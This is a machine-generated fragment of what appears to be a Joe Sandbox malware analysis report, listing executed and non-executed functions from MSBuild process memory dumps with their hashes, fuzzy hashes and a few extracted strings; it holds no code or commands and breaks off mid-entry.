                              • Instruction Fuzzy Hash: CD01167260061AEFC710DF58D880DAAF7B6FF88320314CA2AE4298B650DB31F951CBD0
                              Function 05B3D2D0 Relevance: .0, Instructions: 42COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843540424.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b30000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 38216fa5cfa5f011eb04de6c36f879fcb66d0ff755ae040876ea10c08f8968a9
                              • Instruction ID: 94c7415bfda8954bbe6048801658c4342bb5a16291c96dd27f61c1f1690b357f
                              • Opcode Fuzzy Hash: 38216fa5cfa5f011eb04de6c36f879fcb66d0ff755ae040876ea10c08f8968a9
                              • Instruction Fuzzy Hash: 1FF0C236B082115FD745DA59E011A6EBBD6EBC92B0B088475E809DB340DF32EC41DB94
                              Function 05B894D0 Relevance: .0, Instructions: 40COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 269ea6a2657c4e15d76d9e60f01e5a1fc7fed22f8bfd4a400cbcfd70387d3f84
                              • Instruction ID: 8611c8c01400399244e156a988da8353e31edf7b13354bac02bf3b6b36f01ce6
                              • Opcode Fuzzy Hash: 269ea6a2657c4e15d76d9e60f01e5a1fc7fed22f8bfd4a400cbcfd70387d3f84
                              • Instruction Fuzzy Hash: 0F0105701457408FD735EB25D058A72BBE2AF4A315F1459ADE4878BBA1C735F84ACB20
                              Function 05B8FDD0 Relevance: .0, Instructions: 39COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 61a0d008b5ef2a8417d9e7e5c5c603d88e947f0b18c79f18710a1ce28235ebc4
                              • Instruction ID: f71565089bd9cbf607d0999d43950182dc0bcf4344cd8b5b3ef5b3d4b6993581
                              • Opcode Fuzzy Hash: 61a0d008b5ef2a8417d9e7e5c5c603d88e947f0b18c79f18710a1ce28235ebc4
                              • Instruction Fuzzy Hash: 1AF0F0AB20C2910BEF073264F813BB51EA5CB92315F4990D2F5009A78AD918AA02C3F1
                              Function 05B85122 Relevance: .0, Instructions: 39COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f6273a976edffb0c288bb749feeeae3fa97689f29c85e2294d98afea2ea90c99
                              • Instruction ID: 0958aaab3f40a591a5ff56d1eee09752ea7a2b0427eb66579efc7069c09e6496
                              • Opcode Fuzzy Hash: f6273a976edffb0c288bb749feeeae3fa97689f29c85e2294d98afea2ea90c99
                              • Instruction Fuzzy Hash: 2601A5B5D05209EFDB54DF99D845BAEBBF5FB48300F108169D814A3350E3346A45DF91
                              Function 05B89600 Relevance: .0, Instructions: 39COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 774cd6a0fb65262724628bfca730267b1e8a50be6e9f07dcf4ef1909efcae515
                              • Instruction ID: 61040e1b6ddee19fade989ec7e02ac7ab20b0c8a6c126c5fdca88799dea6f691
                              • Opcode Fuzzy Hash: 774cd6a0fb65262724628bfca730267b1e8a50be6e9f07dcf4ef1909efcae515
                              • Instruction Fuzzy Hash: 77010475600A09AFC714DF69D480A56F7E5FB88320B10C56AE86987751CB31F811CBA0
                              Function 00DCD920 Relevance: .0, Instructions: 36COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3815250190.0000000000DCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DCD000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_dcd000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4ba7ba64d0a479fc4bbcb611b9b397db78cefad9cd0ea101430c970d7915033d
                              • Instruction ID: cc309c0df0186d06fbd46df0fd868001740aa01ee28b59d769eb43a403b98b41
                              • Opcode Fuzzy Hash: 4ba7ba64d0a479fc4bbcb611b9b397db78cefad9cd0ea101430c970d7915033d
                              • Instruction Fuzzy Hash: A9F06D76405344AFEB148E16CDC4B62FBE8EB91734F18C56EED485F286C2799844CEB1
                              Function 05B85130 Relevance: .0, Instructions: 35COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9b09398ca058695a2f30269d1894ea7462643d7463a623614a357549e6f03c2a
                              • Instruction ID: 87148ae4e63ad873b4e6b3128f4c01315ca8ff8788622fcfdd757129f8319188
                              • Opcode Fuzzy Hash: 9b09398ca058695a2f30269d1894ea7462643d7463a623614a357549e6f03c2a
                              • Instruction Fuzzy Hash: F40172B4D05209EFCB54DF99D844AAEBBB5FB48300F20816AD814A3350D3746A45DF91
                              Function 04E5F081 Relevance: .0, Instructions: 33COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f41c3a46604c16b51ff64b6308aeb05d5413d3dc2f71354d27fc0948cc681c8a
                              • Instruction ID: 60b5128f13f9100f6feab6567429177873ae2dd7e05dfa5bf6401dfa51847250
                              • Opcode Fuzzy Hash: f41c3a46604c16b51ff64b6308aeb05d5413d3dc2f71354d27fc0948cc681c8a
                              • Instruction Fuzzy Hash: DAF0E9712093C05FC3238B75A541A52BFF2AF8711530D81EBD988C7563CB31D805D351
                              Function 05B89180 Relevance: .0, Instructions: 33COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 349f4d835f318f1d3d8dd51a9b86cb0cfacccc7cfbcc60a3592b4858f106c6c3
                              • Instruction ID: 21a8c3436ff03a3ad2170b5f02ddf9a2b2752d7e61a18032accadd91c946064a
                              • Opcode Fuzzy Hash: 349f4d835f318f1d3d8dd51a9b86cb0cfacccc7cfbcc60a3592b4858f106c6c3
                              • Instruction Fuzzy Hash: E2F0E5323082086BDF20AE9AD4C5BB9B799EB84724F14A16AF81887700C730F485C2A1
                              Function 05B89438 Relevance: .0, Instructions: 33COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 03244947080d01535314fe9762484f0a4ab897658b693abb69e313e81b4320a5
                              • Instruction ID: 2c486d7d38ceb891b1303063759e3fea727794495bbff5a736f54be943ca0070
                              • Opcode Fuzzy Hash: 03244947080d01535314fe9762484f0a4ab897658b693abb69e313e81b4320a5
                              • Instruction Fuzzy Hash: 80F08C302087804FE735DA28C458B23BBE5AF46208F0809DDD4838BBA3C6A6F949C7D1
                              Function 04E5C106 Relevance: .0, Instructions: 32COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1b550dae359bf57da775b3d53272c7794ba2dde7361d01cdf3c0beb6a8c86538
                              • Instruction ID: a2e1a25cae2dda3a06bf7b029b4a0cfdbf227071220635914d43774887202ae0
                              • Opcode Fuzzy Hash: 1b550dae359bf57da775b3d53272c7794ba2dde7361d01cdf3c0beb6a8c86538
                              • Instruction Fuzzy Hash: 78F02E39B04358CBDF32A57956242BD77B55BC5145B306159CB4287111DA3055059341
                              Function 04E5C018 Relevance: .0, Instructions: 31COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1bcb3cd04a77738586a461053177ec8c6664a6c5c30cc241adc711f93529a275
                              • Instruction ID: c56d2ed04374e3a432e647c4aa64a32d2286e3d5cf9e9a593ae7356ab374bbf0
                              • Opcode Fuzzy Hash: 1bcb3cd04a77738586a461053177ec8c6664a6c5c30cc241adc711f93529a275
                              • Instruction Fuzzy Hash: 9EF05470D0938C6FDB25DFB8D81449CBFF0AB06214B1441DAE894D72A1D6341A45CB82
                              Function 05B85D88 Relevance: .0, Instructions: 31COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ab331856ecb2391de2be3fcc375425e603b61505ecca633d775b770a2952f8f2
                              • Instruction ID: ffb28d762ac95f0a9ca88e329b90cbcb50daeacc196345773b61ea6e2dbca82f
                              • Opcode Fuzzy Hash: ab331856ecb2391de2be3fcc375425e603b61505ecca633d775b770a2952f8f2
                              • Instruction Fuzzy Hash: 2EF03AB4C09218AFCB05EFA9D8466ADBFB1EB1A301F04D1AAE868A2341D7344615DF90
                              Function 05B894C0 Relevance: .0, Instructions: 29COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8512a9ef056897a65eb71aba96106be86e0d5f9b2183126890114fefadf6f477
                              • Instruction ID: 7d2fdd16b1d19040c4d295a9d916fef0936e74e7e4fdd106976e89c66ce99c46
                              • Opcode Fuzzy Hash: 8512a9ef056897a65eb71aba96106be86e0d5f9b2183126890114fefadf6f477
                              • Instruction Fuzzy Hash: 64F0BE311097808FE735EB24C404BB2BBE6AF06314F4856EDE08A4BB52C265F88EC760
                              Function 05B89448 Relevance: .0, Instructions: 29COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 648c88a176beba1afa01ee33900b048028703ec56aa1d7ceffde59350e5b8202
                              • Instruction ID: ba51545f2e86ac8cd3825bc241de61286e67e8e34747d6f5267efc40d6abdc4d
                              • Opcode Fuzzy Hash: 648c88a176beba1afa01ee33900b048028703ec56aa1d7ceffde59350e5b8202
                              • Instruction Fuzzy Hash: 0BF017302187808FE739DA28C458B73BBE5AF45608F0859DDD4874BBA2C6A6F949C7D1
                              Function 04E5F2B0 Relevance: .0, Instructions: 26COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 088f408efe41ac0a0576a78714992b3ba8604efc6bc1bf82f96c62c664ee1431
                              • Instruction ID: 75b69345fb261d01f8e005d18ca1b2044774cd464e3d09b3ca2e3266dbdaa608
                              • Opcode Fuzzy Hash: 088f408efe41ac0a0576a78714992b3ba8604efc6bc1bf82f96c62c664ee1431
                              • Instruction Fuzzy Hash: 8CE04F773001146B87109A4EE404D9ABBADDBD87717048037FA08C7320CA71DC5286A4
                              Function 05B886A7 Relevance: .0, Instructions: 23COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0950a4b8f493ff39e266cc62f04dff33f5c2c6ed96f73be85b819912d1a61666
                              • Instruction ID: 947336d8b17cd1769546215a9533e1900d8b42be8e4dfb52f74a23f3f5dcb3e9
                              • Opcode Fuzzy Hash: 0950a4b8f493ff39e266cc62f04dff33f5c2c6ed96f73be85b819912d1a61666
                              • Instruction Fuzzy Hash: 88E04F36310410DBC705AFAAD944A5CB7A7EFD8260B19C4AAF1498B771CF36DC52CB84
                              Function 04E5D6FF Relevance: .0, Instructions: 21COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c0f84bbe16b79e9b6157f428e21ceca23c3caeeedf8c7e2c1438e6f06e723c42
                              • Instruction ID: 05509d0e82eb3ba683b00582e71d9fa44b7f043816053c14d8994c64a4253e1b
                              • Opcode Fuzzy Hash: c0f84bbe16b79e9b6157f428e21ceca23c3caeeedf8c7e2c1438e6f06e723c42
                              • Instruction Fuzzy Hash: 13E08C6160D7C16FE31393649C547023BB0EFD6609F0D56D6E480CF2A3DA68EC0A9716
                              Function 05B886B8 Relevance: .0, Instructions: 21COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 71adb96dbf62e38e162e7b0aed5700086aa4d583be56bc90b043d2e8bad4b578
                              • Instruction ID: 0a4008aa177c487a1aca4d396a7d9cfe2e55d74b16ebb815b648a0d55d5a79c8
                              • Opcode Fuzzy Hash: 71adb96dbf62e38e162e7b0aed5700086aa4d583be56bc90b043d2e8bad4b578
                              • Instruction Fuzzy Hash: B4E0EC36300514AB8B55AE9AD804C6AB7AAEFC966031580AAF5098B331CF72ED51CB94
                              Function 05B3D2C0 Relevance: .0, Instructions: 21COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843540424.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b30000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f2afd54d91e142adfc92132e640ac8416cfc022443b7df19ba384030373f822d
                              • Instruction ID: 97c4c48477342bd9e70270e2a9c09c2c85c7b1bcf6df356226731e31bf28a30e
                              • Opcode Fuzzy Hash: f2afd54d91e142adfc92132e640ac8416cfc022443b7df19ba384030373f822d
                              • Instruction Fuzzy Hash: 05E0127AA082441AD710CAB9E506BDA7FE8DBD5261F18847AE859D3242D634D002AF61
                              Function 04E5C028 Relevance: .0, Instructions: 19COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 255601f0bd0d0abf2bc2f199cef5887f237c4c4caf41d0cb62b44cba0533950f
                              • Instruction ID: a5423998973e556d70b8b7bb150f8c782ecaa51da19b161f7798b9a5fc2a4348
                              • Opcode Fuzzy Hash: 255601f0bd0d0abf2bc2f199cef5887f237c4c4caf41d0cb62b44cba0533950f
                              • Instruction Fuzzy Hash: FBE0BD70E0430CAFCF58EFA9E44559DBBF5AB89300F0081A9E819E7350EA346A188F81
                              Function 04E5C120 Relevance: .0, Instructions: 19COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3c15377813c8485b104e7886930187474c15b500a32ad3d7f7a87adbcfb1b257
                              • Instruction ID: d5a53d2b63f23e32b6c9e3fbe045cd0ec11b61dbc6e6677ab4acc27c87572fd5
                              • Opcode Fuzzy Hash: 3c15377813c8485b104e7886930187474c15b500a32ad3d7f7a87adbcfb1b257
                              • Instruction Fuzzy Hash: 41D0953130470457DF21955456B03FD7351CB441657301162CF1942110D53161025241
                              Function 04E5BFEF Relevance: .0, Instructions: 17COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 90da50779a9a7c5b1791bb6621e7ea7cc4e3ee9a3bb8cf233bcb13a6e3e53329
                              • Instruction ID: 651fb339ecec2b5e314e30fc9048d0aaaeb7f9908c5f10d3cba1101db9bfa7e0
                              • Opcode Fuzzy Hash: 90da50779a9a7c5b1791bb6621e7ea7cc4e3ee9a3bb8cf233bcb13a6e3e53329
                              • Instruction Fuzzy Hash: A3D02260C09B0C7FCA10CFA99D0557A3BA8CF27330B4003E2E838973F2E4129A000392
                              Function 05B86D08 Relevance: .0, Instructions: 14COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: be9f934f65e2aab3672ba3cf20835abaae1416b76bcdc52614003b5e13d05f0a
                              • Instruction ID: c06d19ee628bd0ac0ab6b4a765933587efe0605dca8197f0b65588a99ba10013
                              • Opcode Fuzzy Hash: be9f934f65e2aab3672ba3cf20835abaae1416b76bcdc52614003b5e13d05f0a
                              • Instruction Fuzzy Hash: 22C012B20023217BCA121264DC5ABE72F9ADB09360F088822B488E2B25C5289892A1B1
                              Function 05B89498 Relevance: .0, Instructions: 14COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5cdfebce4e891cc98438f870672d9a016627e50d2fbc4b143b3b3cc4175a83dc
                              • Instruction ID: ffec6aed5d61878c176e78015790924c04a71e535f83306fd34007ea46858f87
                              • Opcode Fuzzy Hash: 5cdfebce4e891cc98438f870672d9a016627e50d2fbc4b143b3b3cc4175a83dc
                              • Instruction Fuzzy Hash: 37D0C9B61606058FC301CB09C885E407399AF28A25B0550A6E1088B762EA32E819A950
                              Function 04E5CAD8 Relevance: .0, Instructions: 13COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5affad6cd8c890738ce03e34770d52944b92f3e2f4a98d803201b4f6b629d60f
                              • Instruction ID: 1b76a11e8fbc1228220793e9ee3e60b4e30b9430cf29fd3b72ac421407cd1e81
                              • Opcode Fuzzy Hash: 5affad6cd8c890738ce03e34770d52944b92f3e2f4a98d803201b4f6b629d60f
                              • Instruction Fuzzy Hash: 87D012709483841FFB0A832494213573F65A786355B25A092C592CF577E518FC52C7E6
                              Function 04E5D72B Relevance: .0, Instructions: 12COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7ad820d9bdaaf24464ba2aaf056ae38bc7caa19d29d5c0fee87a0817c7f4b92e
                              • Instruction ID: d65d6c16007c8c3547b7b90748191a7e5ce9ba9327960bb7880642cddb0329e3
                              • Opcode Fuzzy Hash: 7ad820d9bdaaf24464ba2aaf056ae38bc7caa19d29d5c0fee87a0817c7f4b92e
                              • Instruction Fuzzy Hash: E5D012FB8047C08FD3116BB0FEA73103B14DF5511AF4940DAEC188E217EA2995109266
                              Function 05B894A8 Relevance: .0, Instructions: 8COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 219e5f4649fec8ffc8e65a30f26d5f9cdd73af2f1043898356b25522dc0f06c2
                              • Instruction ID: 1deb801c89d1f91a9d22591982e9095f20597600ec6a078a76569c6a44fdfdfb
                              • Opcode Fuzzy Hash: 219e5f4649fec8ffc8e65a30f26d5f9cdd73af2f1043898356b25522dc0f06c2
                              • Instruction Fuzzy Hash: 45C048792602088F8240DB59D488C11B3E8AF58A2435180A9E6098B722CB32FC21CA54
                              Function 04E5D738 Relevance: .0, Instructions: 7COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cf09ffb4551be0d3c1ca7c6febd3d0284fd22d8e56f71a3540bc9040ba05e5e9
                              • Instruction ID: c8340472f56ab62ef342e5f10d13576c14f61a8390fb6f8e5ee01f1688b74978
                              • Opcode Fuzzy Hash: cf09ffb4551be0d3c1ca7c6febd3d0284fd22d8e56f71a3540bc9040ba05e5e9
                              • Instruction Fuzzy Hash: 0EB0123000034D4FC6407790F946534371CE9485047408190B40C0E00A9D78681046DA
                              Function 04E5CB10 Relevance: .0, Instructions: 7COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9010b30b2af3269398839aa0ce29e68b998816685c8f27a94c21dbcb96020d76
                              • Instruction ID: 1c135dedbb0040300fa0a8457fc322f95b251c27ee8f2f2ca543e85216fefefc
                              • Opcode Fuzzy Hash: 9010b30b2af3269398839aa0ce29e68b998816685c8f27a94c21dbcb96020d76
                              • Instruction Fuzzy Hash: 2AB0123002030D8BC7417BA1FC06504372CA548514790C210F10D8A105AD786C104A86

                              Non-executed Functions

                              Function 05B80040 Relevance: 15.7, Strings: 10, Instructions: 3226COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID: #$#$S$S$T$T$T$T$T$T
                              • API String ID: 0-3493106379
                              • Opcode ID: e6d1b5fd58432dce5b1e7ed7ee61019ed4fd74d728507191d8208f5fa4bcf2ae
                              • Instruction ID: 1541cfa3dfca020d21432875a9dcfc798300c9dc2a3897437721af67169e429f
                              • Opcode Fuzzy Hash: e6d1b5fd58432dce5b1e7ed7ee61019ed4fd74d728507191d8208f5fa4bcf2ae
                              • Instruction Fuzzy Hash: F1936278E012298FDB65DF29CD84B99B7B2FB89304F1081EA980DA7355DB356E81CF40
                              Function 05B8CD40 Relevance: 12.1, Strings: 8, Instructions: 2141COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID: #$#$S$S$T$T$T$T
                              • API String ID: 0-1091979054
                              • Opcode ID: 6bedb824483149d6fb353b6434d2681b8a405177ad1fac7d4310c72b64c6186c
                              • Instruction ID: e50f0a68e89cca9c8e9a2d9f94047949eb656e2794223410b1b00d98a2212bbc
                              • Opcode Fuzzy Hash: 6bedb824483149d6fb353b6434d2681b8a405177ad1fac7d4310c72b64c6186c
                              • Instruction Fuzzy Hash: F14383B4E012298FDB65DF25D884B99B7B2FB88301F1081EAD90DA7354DB35AE91CF50
                              Function 04E691D8 Relevance: 1.7, Strings: 1, Instructions: 492COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID: 0o#p
                              • API String ID: 0-2085137917
                              • Opcode ID: 65d179b3febf4a663514228c72706bbe061a47fb4a7d4f746306c943a7723654
                              • Instruction ID: 3f1d90e8936f865d8a78bc02f8e861c9a777b06ae38265f870549638f20eb141
                              • Opcode Fuzzy Hash: 65d179b3febf4a663514228c72706bbe061a47fb4a7d4f746306c943a7723654
                              • Instruction Fuzzy Hash: 8E328374E41228CFDB64DF65D984B99BBB2BF49300F1091E9D50AAB361DB34AE81CF50
                              Function 05B84594 Relevance: 1.5, Strings: 1, Instructions: 284COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID: 0o#p
                              • API String ID: 0-2085137917
                              • Opcode ID: 54467248f225d8941ea7bdf4b5317025e1b8e2d4adaab78ed0b5494d17de9b6e
                              • Instruction ID: f815f8e822578804b2bd5cb0ddd2a3295010080439baa85419fc0af4d2a3452e
